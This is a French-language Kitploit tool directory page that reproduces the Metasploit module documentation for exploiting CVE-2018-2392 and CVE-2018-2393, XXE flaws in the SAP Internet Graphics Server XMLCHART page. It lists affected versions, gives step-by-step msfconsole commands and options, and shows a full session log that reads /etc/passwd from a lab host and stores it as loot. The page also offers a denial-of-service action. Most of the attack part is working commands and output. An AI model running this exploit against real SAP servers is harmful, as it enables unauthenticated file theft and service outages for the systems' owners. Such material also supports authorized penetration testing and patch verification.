Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
sap_igs_xxe — Attaque XXE SAP IGS CVE-2018-2392 et CVE-2018-2393 | Kitploit
Outils/GitHubGitHub/vladimir-ivanov-git/sap_igs_xxe
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubvladimir-ivanov-git/sap_igs_xxe

sap_igs_xxe

Attaque XXE SAP IGS CVE-2018-2392 et CVE-2018-2393

Voir le dépôt
1il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Attaque XXE SAP IGS CVE-2018-2392 et CVE-2018-2393

Ce module dans Metasploit Framework

Documentation

Module

Application vulnérable

Ce module exploite les CVE-2018-2392 et CVE-2018-2393, deux vulnérabilités XXE dans la page XMLCHART des SAP Internet Graphics Servers (IGS) exécutant les versions 7.20, 7.20EXT, 7.45, 7.49 ou 7.53. Ces vulnérabilités surviennent en raison d'un manque de validation appropriée sur la balise Extension HTML lors de l'envoi d'une requête POST à la page XMLCHART pour générer un nouveau graphique.

Une exploitation réussie permettra à des attaquants distants non authentifiés de lire des fichiers du serveur en tant qu'utilisateur à partir duquel le service IGS est démarré, qui sera généralement l'utilisateur admin SAP. Alternativement, les attaquants peuvent également abuser de la vulnérabilité XXE pour mener une attaque par déni de service contre le serveur SAP IGS vulnérable.

Contexte de l'application

Le Internet Graphics Service (IGS) fournit une infrastructure permettant aux développeurs d'afficher des graphiques dans un navigateur internet avec un minimum d'effort. Il a été intégré dans plusieurs technologies d'interface utilisateur SAP différentes où il permet d'utiliser des données provenant d'un autre système SAP ou d'une source de données pour générer des sorties graphiques ou non graphiques dynamiques.

Étapes d'installation

Les étapes pour installer et mettre à jour le serveur SAP IGS peuvent être trouvées en ligne sur cette page. Des informations supplémentaires sur la configuration du serveur IGS peuvent être trouvées ici. Enfin, des informations sur l'administration du serveur IGS peuvent être trouvées ici.

Une fois installées et configurées, les instances seront vulnérables sur le port HTTP par défaut 40080.

Étapes de vérification

  1. Démarrez msfconsole
  2. Faites : workspace [WORKSPACE]
  3. Faites : use auxiliary/admin/sap/sap_igs_xmlchart_xxe
  4. Faites : set RHOSTS [IP]
  5. Faites : set FILE [remote file name]
  6. Faites : set action READ
  7. Faites : check
  8. Vérifiez que la méthode check identifie correctement si la cible est vulnérable ou non.
  9. Faites : run
  10. Vérifiez que le contenu du fichier que vous avez spécifié a été renvoyé.

Options

FILE

Fichier à lire depuis le serveur distant. Exemple : /etc/passwd

URIPATH

Il s'agit du chemin vers la page XMLCHART du serveur SAP IGS qui est vulnérable à XXE. Par défaut, il est défini sur /XMLCHART, mais il peut être modifié si le serveur SAP IGS a été installé sous un chemin différent de la racine web. Par exemple, si le serveur SAP IGS a été installé sous le chemin /igs/ dans la racine web, alors cette valeur serait définie sur /igs/XMLCHART.

Actions

root@kitploit:~
   Nom    Description
   ----   -----------
   READ   Lecture de fichier distant
   DOS    Déni de service

Scénarios

Version vulnérable de SAP IGS : 7.45 fonctionnant sur SUSE Linux Enterprise Server for SAP Applications 12 SP1

root@kitploit:~
msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options

Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FILE     /etc/passwd          no        File to read from the remote server
   Proxies  http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.30.29         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    40080                yes       The target port (TCP)
   SSL      false                no        Negotiate SSL/TLS for outgoing connections
   URIPATH  /XMLCHART            yes       Path to the SAP IGS XMLCHART page from the web root
   VHOST                         no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read


msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] Running module against 172.16.30.29

[+] File: /etc/passwd content from host: 172.16.30.29
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
admin:x:1000:100:admin:/home/admin:/bin/bash
j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
Services
========

host          port   proto  name  state  info
----          ----   -----  ----  -----  ----
172.16.30.29  40080  tcp    http  open   SAP Internet Graphics Server (IGS)

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                                             References
---------                ----          ----                                             ----------
2020-10-07 10:12:37 UTC  172.16.30.29  SAP Internet Graphics Server (IGS) XMLCHART XXE  CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot

Loot
====

host          service  type              name         content     info                  path
----          -------  ----              ----         -------     ----                  ----
172.16.30.29           igs.xmlchart.xxe  /etc/passwd  text/plain  SAP IGS XMLCHART XXE  /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt

Requête de vérification HTTP dans Burp

HTTP check request in Burp

Première requête HTTP pour obtenir le fichier /etc/passwd distant dans Burp

First HTTP request to get remote /etc/passwd file in Burp

Deuxième requête HTTP pour obtenir le fichier /etc/passwd distant dans Burp

Second HTTP request to get remote /etc/passwd file in Burp

Vidéo de démonstration

Demo video

Télécharger l’outil